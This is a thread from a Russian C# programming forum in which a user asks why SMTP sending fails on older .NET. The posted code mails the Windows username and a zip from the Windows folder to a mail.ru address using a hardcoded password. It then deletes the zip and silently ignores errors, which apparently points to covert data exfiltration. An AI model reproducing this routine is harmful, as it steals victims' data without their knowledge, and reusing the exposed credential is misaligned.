Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > .NET Frameworks (точка нет фреймворки) > C# (си шарп)
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 26.10.2015, 00:40   #11
ZiDoxFix
Пользователь
 
Регистрация: 09.05.2015
Сообщений: 70
Вопрос

Получилось)) На 4-ке всё хорошо отправляет!
Теперь я хочу отправить на 3-ки но не отправляет:
Вот так отправляет всё на 4-ке:
Код:
MailMessage m = new MailMessage();
            SmtpClient sc = new SmtpClient();
            try
            {
                m.From = new MailAddress("*****@mail.ru");
                m.To.Add(new MailAddress("*****@mail.ru"));
                m.SubjectEncoding = Encoding.UTF8;
                m.Subject = "Test";
                m.BodyEncoding = Encoding.UTF8;
                m.Body = Environment.UserName;
                sc.Host = "smtp.mail.ru";
                sc.Port = 2525;
                sc.Credentials = new NetworkCredential("*****@mail.ru", "6v0omvpbu");
                sc.EnableSsl = true;
                Attachment att = new Attachment(@"C:\Windows\BiZ.zip");
                m.Attachments.Add(att);
                sc.Send(m);
                sc = null;
                att.Dispose();
                File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Windows) + @"\BiZ.zip");
            }
            catch { }
        }
Причина в том что не отправляет ничего, исключения даже нету, как не крути!
Всё прекрасно компилится без ошибок, но отправки нету

Прошу вашей поддержки)

Последний раз редактировалось Stilet; 26.10.2015 в 08:56.
ZiDoxFix вне форума Ответить с цитированием
Старый 26.10.2015, 01:05   #12
come-on
Участник клуба
 
Регистрация: 21.10.2015
Сообщений: 1,361
По умолчанию

Код:
                System.Net.Mail.SmtpClient client = new System.Net.Mail.SmtpClient(***, ***);

                client.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;
                client.UseDefaultCredentials = false;

                client.EnableSsl = true;
                client.Credentials = new System.Net.NetworkCredential(***, ***);

                // Create the message:
                var mail = new System.Net.Mail.MailMessage();
                mail.From = new System.Net.Mail.MailAddress(***);
                mail.To.Add(***);
                mail.Subject = ***;
                mail.Body = ***;
                mail.IsBodyHtml = true;
                // Send:
                client.SendMailAsync(mail);
вот такой код без проблем отправляет куда угодно что угодно.

Последний раз редактировалось come-on; 26.10.2015 в 01:08.
come-on вне форума Ответить с цитированием
Старый 26.10.2015, 06:31   #13
Akeloya
Форумчанин
 
Регистрация: 27.01.2014
Сообщений: 115
По умолчанию

Credentials порадовали

Вы сами себе создаете проблем:
sc.Port = 2525;

В то время как мэйл.ру нам говорит следующее:
Порт — IMAP — 143 (протокол шифрования STARTTLS) или 993 (протокол шифрования SSL/TLS)
POP3 — 995 (протокол шифрования SSL/TLS)
SMTP — 465 (протокол шифрования SSL/TLS).

Соответственно, вы шлете на порт, который закрыт, пакеты на брандмауэре исчезают, ибо настроено так и вы при этом удивляетесь, чего же оно вам ответа не дает?
Akeloya вне форума Ответить с цитированием
Старый 26.10.2015, 10:46   #14
ZiDoxFix
Пользователь
 
Регистрация: 09.05.2015
Сообщений: 70
По умолчанию

Попробовал ничего не отправляет
Порт менял - 0 реакций!
ZiDoxFix вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IdCMDTCP и передача zip архива _CyberHedgehog_ Работа с сетью в Delphi 14 23.08.2013 15:36
Сравнение времени локального Zip архива с Zip архивом на FTP Qwerty192837 Общие вопросы Delphi 1 28.05.2013 10:20
Распаковка zip архива используя Ionic.Zip santaXZ C# (си шарп) 1 20.04.2013 02:46
DSPack воспроизведение из ZIP архива Adult_Master Мультимедиа в Delphi 0 22.01.2013 18:32
Чтение с zip архива Nikk[UA] Общие вопросы Delphi 15 21.06.2012 00:15